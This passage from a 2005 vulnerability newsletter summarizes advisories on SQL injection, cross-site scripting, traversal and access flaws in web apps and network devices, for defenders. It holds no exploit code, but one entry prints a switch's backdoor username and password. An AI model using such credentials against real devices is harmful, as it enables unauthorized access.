Ref: http://www.securityfocus.com/bid/14013
______________________________________________________________________

05.25.39 CVE: Not Available
Platform: Web Application
Title: i-Gallery Folder Argument Cross-Site Scripting
Description: i-Gallery is a web-based photo gallery application.
i-Gallery is affected by a cross-site scripting vulnerability.
i-Gallery versions 3.x and earlier are known to be vulnerable.
Ref: http://www.securityfocus.com/bid/14002
______________________________________________________________________

05.25.40 CVE: CAN-2005-2037
Platform: Web Application
Title: Fortibus CMS SQL Injection
Description: Fortibus CMS is a content management system. It is prone
to multiple SQL injection vulnerabilities. These issues are due to a
failure in the application to properly sanitize user-supplied input
before using it in SQL queries. These vulnerabilities affect the
"logon.asp", "WeeklyNotesDisplay.asp" and the search page scripts of
the application. These issues could permit remote attackers to pass
malicious input to database queries, resulting in modification of
query logic and other attacks. Fortibus CMS 4.0 is vulnerable to these
issues.
Ref: http://www.securityfocus.com/bid/14004
______________________________________________________________________

05.25.41 CVE: Not Available
Platform: Web Application
Title: cPanel User Parameter Cross-Site Scripting
Description: cPanel is a web hosting control panel that allows a user
to manage their hosted account through a web-based interface. cPanel
is affected by a vulnerability that is identified in the application
that may allow a remote attacker to execute HTML or script code in a
user's browser. cPanel versions 9.1 and earlier are known to be
vulnerable.
Ref: http://www.securityfocus.com/bid/13996
______________________________________________________________________

05.25.42 CVE: CAN-2003-0557
Platform: Web Application
Title: LaGarde StoreFront Shopping Cart LOGIN.ASP SQL Injection
Description: StoreFront Shopping Cart is a ecommerce shopping cart
implemented in ASP. It is vulnerable to an SQL injection issue due to
insufficient sanitization of user-supplied data in "login.asp" script.
A remote attacker could exploit this issue to get hold of sensitive
information or modify data. StoreFront Shopping Cart version 5.0 is
vulnerable.
Ref: http://www.zone-h.org/en/advisories/read/id=2684/
______________________________________________________________________

05.25.43 CVE: CAN-2005-2014
Platform: Web Application
Title: paFaq Database Unauthorized Access
Description: paFaq is a FAQ and knowledge base system. Insufficient
access validation in the "backup.php" script exposes an issue by which
a remote unauthenticated user can invoke the script and retrieve a
complete backup of the application database. paFaq Beta version 4.0 is
affected.
Ref: http://www.securityfocus.com/bid/13999
______________________________________________________________________

05.25.44 CVE: Not Available
Platform: Web Application
Title: paFaq Question Cross-Site Scripting
Description: paFaq is a knowledge base system. It is vulnerable to a
cross-site scripting issue due to a failure in the application to
properly sanitize user-supplied input to the "id" parameter during a
"Question" action. An attacker may leverage this issue to steal
cookie-based authentication credentials as well as other attacks. All
current versions of paFaq are vulnerable.
Ref: http://www.securityfocus.com/bid/14001/info
______________________________________________________________________

05.25.45 CVE: CAN-2005-2012
Platform: Web Application
Title: paFaq Administrator Username SQL Injection
Description: paFaq is a FAQ and knowledge base system. It is reported
to be vulnerable to an SQL injection issue due to improper
sanitization of user-supplied input to the "username" parameter. paFaq
version Beta 4 is reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/14003
______________________________________________________________________

05.25.46 CVE: Not Available
Platform: Web Application
Title: i-Gallery Directory Traversal
Description: i-Gallery is a photo gallery web application. It is
vulnerable to a directory traversal issue due to insufficient
sanitization of "../" path variable. i-gallery versions 3.x are
vulnerable.
Ref: http://www.hat-squad.com/en/000169.html
______________________________________________________________________

05.25.47 CVE: Not Available
Platform: Web Application
Title: Contelligent Preview Privilege Escalation
Description: Contelligent is a web-based content management system. It
is reported to be vulnerable to a privilege escalation issue because
it allows an attacker with preview access to gain elevated access to
the system. Contelligent versions 9.0.15 and earlier are reported to
be vulnerable.
Ref: http://www.securityfocus.com/bid/13987
______________________________________________________________________

05.25.48 CVE: CAN-2005-2007
Platform: Web Application
Title: Trac Unauthorized File Upload/Download Vulnerability
Description: Edgewall Software Trac is a wiki and bug tracking system.
Insufficient sanitization of the "id" parameter exposes an
unauthorized file upload and download vulnerability. Trac versions
0.8.3 and earlier are affected.
Ref: http://www.securityfocus.com/bid/13990
______________________________________________________________________

05.25.49 CVE: CAN-2005-2009
Platform: Web Application
Title: Uapplication Ublog Reload Multiple SQL Injection
Vulnerabilities
Description: Ublog Reload is a web log software. It is reported to be
vulnerable to multiple SQL injection issues due to improper
sanitization of user-supplied input. Ublog version 1.0.5 is reported
to be vulnerable.
Ref: http://www.securityfocus.com/bid/13991
______________________________________________________________________

05.25.50 CVE: CAN-2005-0925
Platform: Web Application
Title: Ublog Reload Trackback.ASP Cross-Site Scripting
Description: Ublog Reload is web log software. It is vulnerable to a
cross-site scripting issue due to insufficent sanitization of
user-supplied input to the "btitle" parameter of the "trackback.asp"
script. Uapplication Ublog Reload version 1.0.5 is vulnerable.
Ref: http://echo.or.id/adv/adv18-theday-2005.txt
______________________________________________________________________

05.25.51 CVE: Not Available
Platform: Web Application
Title: osCommerce Multiple HTTP Response Splitting Vulnerabilities
Description: osCommerce is an e-commerce suite. It is reported to be
vulnerable to multiple HTTP response splitting issues due to improper
sanitization of user-supplied input. osCommerce versions 2.2 ms2 and
earlier are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13979
______________________________________________________________________

05.25.52 CVE: Not Available
Platform: Web Application
Title: XAMMP Lang.PHP HTML Injection
Description: XAMPP is an easy to install Apache distribution
containing MySQL, PHP and Perl. XAMMP is prone to an HTML injection
vulnerability. This issue is due to a failure in the application to
properly sanitize user-supplied input before using it in dynamically
generated content. Attacker-supplied HTML and script code would be
executed in the context of the affected Web site, potentially allowing
for theft of cookie-based authentication credentials. This issue is
reported to affect the Linux distribution of XAMMP.
Ref: http://www.securityfocus.com/bid/13982
______________________________________________________________________

05.25.53 CVE: Not Available
Platform: Web Application
Title: XAMMP Lang.PHP Directory Traversal Vulnerability
Description: XAMPP is an easy to install Apache distribution
containing MySQL, PHP and Perl. XAMMP is prone to a directory
traversal vulnerability. This issue is due to a failure in the
application to properly sanitize user-supplied input to "lang.php"
before using it in an include() function call. Exploitation of this
vulnerability could lead to a loss of confidentiality. This issue is
reported to affect the Linux distribution of XAMMP.
Ref: http://www.securityfocus.com/bid/13983
______________________________________________________________________

05.25.54 CVE: Not Available
Platform: Web Application
Title: ATutor Multiple Cross-Site Scripting Vulnerabilities
Description: ATutor is a web-based Learning Content Management System.
It is vulnerable to multiple cross-site scripting vulnerabilities due
to a insufficent sanitization of user supplied input. ATutor versions
1.4.3 and 1.5 RC1 are vulnerable.
Ref: http://lostmon.blogspot.com/
______________________________________________________________________

05.25.55 CVE: Not Available
Platform: Web Application
Title: Cool Cafe Chat LOGIN.ASP SQL Injection
Description: Cool Cafe Chat is a web-based chat application. Cool Cafe
Chat is affected by an SQL injection vulnerability. Cool Cafe Chat
versions 1.2.1 and earlier are known to be vulnerable.
Ref: http://exploitlabs.com/files/advisories/EXPL-A-2005-009-coolcafe.txt
______________________________________________________________________

05.25.56 CVE: Not Available
Platform: Web Application
Title: e107 Website System Multiple Input Validation and Information
Disclosure Vulnerabilities
Description: e107 Website System is a web-based content management
system implemented in PHP. e107 Website System is prone to multiple
input validation and information disclosure vulnerabilities. The
application is also vulnerable to several cross-site scripting and
HTML injection vulnerabilities. Refer to the advisory for further
details.
Ref: http://www.securityfocus.com/bid/13974
______________________________________________________________________

05.25.57 CVE: CAN-2005-2030
Platform: Web Application
Title: Ultimate PHP Board Weak Password Encryption
Description: Ultimate PHP Board (UPB) is affecetd by a weak password
encryption issue. The "users.dat" file contains user and password
information which is stored in a remotely accessible location. The
passwords contained within the file are encrypted using a trivial
substitution cipher.
Ref: http://www.securityfocus.com/bid/13975
______________________________________________________________________

05.25.58 CVE: CAN-2005-2004
Platform: Web Application
Title: Ultimate PHP Board Multiple Cross-Site Scripting
Vulnerabilities
Description: Ultimate PHP Board (UPB) is an open source PHP Bulletin
Board. It is vulnerable to multiple cross-site scripting issues due to
a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to steal cookie-based
authentication credentials as well as other attacks.
Ref: URL:http://secunia.com/advisories/15732
______________________________________________________________________

05.25.59 CVE: CAN-2005-1769
Platform: Web Application
Title: SquirrelMail Multiple Unspecified Cross-Site Scripting
Vulnerabilities
Description: SquirrelMail is a web mail application. It is reported to
be vulnerable to multiple cross-site scripting issues due to improper
sanitization of user-supplied input. SquirrelMail 1.4.4 and earlier
versions are reported to be vulnerable.
Ref: http://www.securityfocus.com/bid/13973
______________________________________________________________________

05.25.60 CVE: Not Available
Platform: Network Device
Title: Enterasys Networks Vertical Horizon Default Backdoor Account
Vulnerability
Description: Enterasys Networks Vertical Horizon is a network switch
appliance. It has a backdoor administrative account with username
"tiger" and password "tiger123".
Ref: http://www.securityfocus.com/bid/14014
______________________________________________________________________

05.25.61 CVE: CAN-2005-2027
Platform: Network Device
Title: Enterasys Networks Vertical Horizon Remote Denial of Service
Description: Enterasys Networks Vertical Horizon is a network switch
appliance. It is vulnerable to a privilege escalation issue that
allows an attacker to invoke administrative commands after connecting
as a guest to the administrative Telnet interface. Exploitation of
this issue allows a remote attacker to deny service for other
legitimate users that are connected to the switch. Enterasys Networks
Vertical Horizon VH-2402S versions 02.05.00 and 02.05.09.07 are
vulnerable.
Ref: http://www.enterasys.com/support/relnotes/VH-2402S-2050908-patch-rel.pdf
______________________________________________________________________

05.25.62 CVE: CAN-2005-2025
Platform: Network Device
Title: Cisco VPN Concentrator Groupname Enumeration Weakness
Description: The VPN Concentrator is a hardware and firmware security
solution available from Cisco systems. It is vulnerable to a remote
groupname enumeration weakness due to a design error that could assist
a remote attacker in enumerating groupnames and carrying out
bruteforce attacks. Please refer the following link for a list of
vulnerable versions.
Ref: http://www.cisco.com/univercd/cc/td/doc/product/vpn/vpn3000/4_7/471con3k.htm#wp560292
______________________________________________________________________

(c) 2005. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a party
other than Qualys (as indicated herein) and permission to use such
material must be requested from the copyright owner.

==end==

Subscriptions: RISK is distributed free of charge to people responsible
for managing and securing information systems and networks. You may
forward this newsletter to others with such responsibility inside or
outside your organization.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFCvCq1+LUG5KFpTkYRAqMpAJ9hW20UNpm0F6nQHc9IIizvNEta4QCgjGKh
/rkcY9/0BP6y3Up3QIAROvU=
=NqDR
-----END PGP SIGNATURE-----

Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]